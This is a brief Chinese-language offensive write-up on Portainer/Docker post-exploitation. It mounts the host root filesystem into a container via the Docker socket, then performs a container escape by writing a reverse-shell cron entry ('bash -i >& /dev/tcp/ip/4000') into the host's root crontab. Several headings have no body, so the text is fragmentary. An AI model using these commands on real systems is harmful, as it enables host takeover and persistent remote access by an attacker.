前言

1
docker -H unix:///run/docker.sock run -v /:/test -it ubuntu:latest /bin/bash
1
Get "https://registry-1.docker.io/v2/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

Portainer 的后渗透

更换镜像源


新建容器



逃逸


1
echo '* * * * * bash -i >& /dev/tcp/ip/4000 0>&1' >> /test/var/spool/cron/root

结束